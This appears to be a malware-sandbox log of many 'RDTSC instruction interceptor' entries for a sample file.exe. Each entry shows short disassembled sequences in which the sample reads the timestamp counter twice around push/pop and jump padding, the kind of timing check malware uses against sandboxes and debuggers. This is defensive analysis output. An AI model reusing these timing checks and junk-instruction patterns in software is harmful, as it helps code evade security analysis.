Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B9E second address: 976BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983B68 second address: 983B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jc 00007FE83906A39Bh 0x0000000d jmp 00007FE83906A395h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 982BE5 second address: 982BFD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE83905447Ch 0x00000008 jnc 00007FE839054476h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FE839054476h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98365B second address: 983661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9838F0 second address: 9838FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9838FB second address: 983901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98993C second address: 989947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989947 second address: 98994D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98869B second address: 9886B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988806 second address: 98881A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A390h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98881A second address: 988838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FE839054476h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988838 second address: 988869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A396h 0x00000007 jmp 00007FE83906A393h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988869 second address: 98886D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98886D second address: 98888D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FE83906A386h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9889DB second address: 9889DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9889DF second address: 9889F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A38Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988C4D second address: 988C57 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE839054476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988C57 second address: 988C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988C60 second address: 988C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE839054476h 0x0000000a pop edi 0x0000000b popad 0x0000000c ja 00007FE839054484h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988C76 second address: 988C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9891AE second address: 9891C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE83905447Ch 0x0000000a jc 00007FE839054476h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98931F second address: 98932D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FE83906A386h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98932D second address: 989331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989331 second address: 989337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989337 second address: 98933C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9897E7 second address: 9897FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A392h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9897FF second address: 989803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989803 second address: 989807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988143 second address: 988149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B456 second address: 98B45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E4C2 second address: 98E4EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE839054476h 0x00000008 jmp 00007FE83905447Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE839054482h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E4EC second address: 98E513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jns 00007FE83906A399h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DDC1 second address: 98DDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE839054476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DDCD second address: 98DE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE83906A38Dh 0x0000000c jmp 00007FE83906A38Ah 0x00000011 js 00007FE83906A399h 0x00000017 jmp 00007FE83906A393h 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FE83906A398h 0x00000023 jnc 00007FE83906A392h 0x00000029 jnc 00007FE83906A386h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DF5B second address: 98DF72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE83905447Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E1ED second address: 98E1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9921EC second address: 992218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054489h 0x00000007 jmp 00007FE83905447Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99721E second address: 99724D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE83906A3BAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE83906A393h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9969E1 second address: 9969E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9969E7 second address: 996A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE83906A38Ch 0x0000000a push eax 0x0000000b jc 00007FE83906A386h 0x00000011 jmp 00007FE83906A397h 0x00000016 pop eax 0x00000017 popad 0x00000018 js 00007FE83906A39Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996A22 second address: 996A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999A9E second address: 999AC2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE83906A392h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FE83906A386h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999AC2 second address: 999AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999C15 second address: 999C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A03F second address: 99A047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A047 second address: 99A04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A04D second address: 99A094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE839054476h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FE83905447Bh 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE839054484h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FE839054486h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A094 second address: 99A09A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A09A second address: 99A0A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A0A1 second address: 99A0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A0A7 second address: 99A0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FA9D second address: 99FACC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE83906A392h 0x00000008 js 00007FE83906A386h 0x0000000e jno 00007FE83906A386h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FE83906A393h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FC2A second address: 99FC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FC2E second address: 99FC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9436A6 second address: 9436AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9436AC second address: 9436C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A399h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0207 second address: 9A0223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE839054488h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0223 second address: 9A0229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0229 second address: 9A0255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE839054482h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE839054480h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A824D second address: 9A8255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8255 second address: 9A8259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8259 second address: 9A8261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8261 second address: 9A8268 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8AD6 second address: 9A8B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FE83906A396h 0x0000000e jmp 00007FE83906A396h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8B0D second address: 9A8B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE839054488h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8E06 second address: 9A8E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8E11 second address: 9A8E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE839054489h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FE83905447Bh 0x00000013 popad 0x00000014 jo 00007FE839054489h 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AAA30 second address: 9AAA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AAA34 second address: 9AAA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jno 00007FE839054476h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ADB99 second address: 9ADB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ADB9D second address: 9ADBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE839054476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE839054487h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ADBC2 second address: 9ADBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ADD96 second address: 9ADD9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AE18A second address: 9AE19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FE83906A386h 0x0000000a jl 00007FE83906A386h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AE19A second address: 9AE1A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AE542 second address: 9AE554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AE554 second address: 9AE55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3592 second address: 9B35A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FE83906A38Dh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B35A6 second address: 9B35C9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE83905448Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA41C second address: 9BA437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FE83906A386h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA5B7 second address: 9BA5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAB93 second address: 9BAB9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FE83906A386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAB9F second address: 9BABB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054483h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BABB7 second address: 9BABE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FE83906A386h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FE83906A395h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BABE2 second address: 9BAC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FE839054487h 0x0000000b jmp 00007FE839054480h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB2A8 second address: 9BB2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA03F second address: 9BA04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA04B second address: 9BA05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 js 00007FE83906A386h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C3375 second address: 9C337D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C6471 second address: 9C647D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007FE83906A386h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D4108 second address: 9D4118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jnp 00007FE839054476h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D4118 second address: 9D4153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A38Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A390h 0x00000011 jmp 00007FE83906A397h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D4153 second address: 9D4163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE83905447Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D3F7E second address: 9D3FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 ja 00007FE83906A386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FE83906A393h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6DB5 second address: 9D6DEB instructions: 0x00000000 rdtsc 0x00000002 je 00007FE83905447Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FE83905449Dh 0x00000014 push edi 0x00000015 jmp 00007FE83905447Ch 0x0000001a pop edi 0x0000001b push esi 0x0000001c jmp 00007FE839054481h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6711 second address: 9D6717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6717 second address: 9D671D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D671D second address: 9D6721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6721 second address: 9D6725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6725 second address: 9D672B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
